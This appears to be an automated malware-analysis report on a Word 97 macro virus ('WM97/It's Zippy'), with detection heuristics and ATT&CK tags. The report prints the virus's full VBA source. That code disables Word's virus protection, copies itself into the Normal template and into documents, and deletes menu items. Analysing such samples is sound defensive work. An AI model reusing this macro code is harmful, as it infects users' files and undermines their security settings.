MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains critical heuristics indicating it is a malicious document, specifically detecting VBA macros and legacy WordBasic auto-exec markers like AutoOpen and AutoClose. The VBA script attempts to export a component to a DLL file and manipulate registry keys, suggesting it aims to download and execute a second-stage payload or establish persistence. The document body discusses AOL privacy concerns, likely serving as a social engineering lure.
Heuristics 5
-
ClamAV: Doc.Trojan.Class-14 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-14
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12470 bytes |
SHA-256: 32f25b8484f570014cdea8e83a68c2fa73a4e3ac6672b49d4685d12c6688fa55 |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-14
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error GoTo zippy
Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48): jx = 0: xj = 1
rytx = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
sytx = NormalTemplate.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
If sytx > Abs(jx) And rytx > Abs(jx) Then GoTo zippy
If sytx = Abs(jx) Then
Set rylx = NormalTemplate.VBProject.VBComponents
Set xhst = ActiveDocument.VBProject.VBComponents
If Month(Now()) = 8 And Day(Now()) = 13 Then Application.ActiveDocument.PrintOut , , , "The Zippy Infection.vir"
If Month(Now()) = 9 And Day(Now()) = 13 Then Application.ActiveDocument.PrintOut , , , "Virus says Hi.vir"
If Month(Now()) = 10 And Day(Now()) = 13 Then Application.ActiveDocument.PrintOut , , , "Stop killing baby virii.vir"
If Month(Now()) = 11 And Day(Now()) = 13 Then Application.ActiveDocument.PrintOut , , , "Zippy Zippy Zippy.vir"
If Month(Now()) = 12 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8", "") = "It's Zippy!"
xhst.Item(Cos(Atn(CInt(1)))).Name = rylx.Item(Cos(Atn(CInt(1)))).Name
xhst.Item(Cos(Atn(CInt(1)))).Export Windows.Application.Path & Chr(46) + Chr(100) + Chr(108) + Chr(108)
End If
If rytx = Abs(jx) Then Set rylx = ActiveDocument.VBProject.VBComponents
rylx.Item(Cos(Atn(CInt(1)))).codemodule.AddFromFile Windows.Application.Path & Chr(46) + Chr(100) + Chr(108) + Chr(108)
With rylx.Item(Cos(Atn(CInt(1)))).codemodule
For j = Chr(49) To Chr(52)
.deletelines Chr(49)
Next j
End With
With rylx.Item(Cos(Atn(CInt(1)))).codemodule
For j = Chr(50) To 72 Step Chr(50)
.replaceline j, Chr(39) & Application.DisplayRecentFiles & Application.Assistant & Application.FocusInMailHeader & Application.Build & Application.StartupPath & Application.ActiveDocument & Application.Version
Next j
End With
If sytx = Abs(jx) Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Delete
If sytx = Abs(jx) Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(79) + Chr(112) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(115) + Chr(46) + Chr(46) + Chr(46)).Delete
If sytx = Abs(jx) Then rylx.Item(Cos(Atn(CInt(1)))).codemodule.replaceline Abs(xj), "Sub AutoClose()"
If sytx = Abs(jx) And rytx = Abs(jx) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
zippy:
If sytx <> Abs(jx) And rytx = Abs(jx) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
'WM97/It's Zippy by Virus
' (.)(.)
' (_
' \____/
' U Smile, with a bit of class!
' Processing file: /opt/analyzer/scan_staging/54f39726ec4f4a2094b08fe1ffed8cdb.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5472 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' Line #2:
' OnError zippy
' Line #3:
' Line #4:
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt VirusProtection
' BoS 0x0000
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt SaveNormalPrompt
' BoS 0x0000
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Ld Options
' MemSt ConfirmConversions
' BoS 0x0000
' LitDI2 0x0000
' St jx
' BoS 0x0000
' LitDI2 0x0001
' St xj
' Line #5:
' Line #6:
' LitDI2 0x0001
' Coerce (Int)
' ArgsLd Atn 0x0001
' ArgsLd Cos 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd codemodule
' MemLd countofl
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.